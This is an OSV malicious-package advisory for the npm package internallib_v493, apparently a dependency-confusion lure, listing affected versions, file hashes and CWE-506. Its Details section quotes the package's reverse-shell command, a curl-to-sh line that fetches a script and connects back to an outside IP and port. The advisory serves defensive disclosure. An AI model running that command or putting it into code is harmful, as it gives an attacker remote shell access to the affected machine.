MAL-2026-4585

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v493/MAL-2026-4585.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4585
Published
2026-05-22T01:24:23Z
Modified
2026-05-26T06:02:37.238832337Z
Summary
Malicious code in internallib_v493 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7)

The package's sole exported function command() in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a reverse-shell script from reverse-shell.sh and piping it directly to sh to establish a connection back to 10.0.74.90 on port 4444. The package has no other functionality — its only advertised export is the backdoor. The package name (internallib_v493) and placeholder metadata (empty author, generic description) are consistent with a dependency-confusion / internal-name-squatting lure targeting organizations with private packages of similar names. A typo in the source (reuquire instead of require) means the payload throws on load in its current form, but the malicious intent is unambiguous and a corrected republish would fire immediately on any caller invoking the export.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "5212257564fabb7f11b34470ea266dd958cc2379cd211d57705e158c96fdaf75",
            "id": "IN-MAL-2026-004112",
            "modified_time": "2026-05-22T01:27:25Z",
            "versions": [
                "1.0.3"
            ],
            "import_time": "2026-05-26T05:51:57.765013526Z",
            "source": "amazon-inspector"
        },
        {
            "sha256": "5ab65af9adef5ba807215c2e5880c940bf73f7c4312bc90c1bd21df1246f6931",
            "id": "IN-MAL-2026-004113",
            "import_time": "2026-05-26T05:51:57.860862258Z",
            "modified_time": "2026-05-22T01:30:33Z",
            "versions": [
                "1.0.4"
            ],
            "source": "amazon-inspector"
        },
        {
            "versions": [
                "1.0.2"
            ],
            "id": "IN-MAL-2026-004111",
            "import_time": "2026-05-26T05:51:57.661975934Z",
            "modified_time": "2026-05-22T01:24:23Z",
            "sha256": "67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7",
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / internallib_v493

Package

Affected ranges

Affected versions

1.*
1.0.2
1.0.3
1.0.4

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "45c455288053ae5841b51a5d097f228a5aa8746fc0b18d693cb51a2d679f2e54",
            "tlsh": "84d023f6d44507ae734c37e6dd11f0656857dc20653951e0fa445152141b84e32111fb",
            "path": "index.js"
        },
        {
            "sha256": "2513063aaea22f6266eab6a9ba65e34943f833bb43380af1dc08a4ad7286ec88",
            "tlsh": "cbd0a9240a221833a5c9032a0caa9482b2208f3f10807c08139b182c40dfab3acfa31c",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "internallib_v493-1.0.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-n13Ff8KR7++ShbccrgieTpX2RCw1FphudmBj22kXbySK7gyfRY3TGyWTBL2nTu6XrjZATIa1FNBu+5W9whmm8Q==",
                "sha1": "b4b79317eada40d14a030c54a0fe5febceedd29e"
            }
        }
    ]
}
cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v493/MAL-2026-4585.json"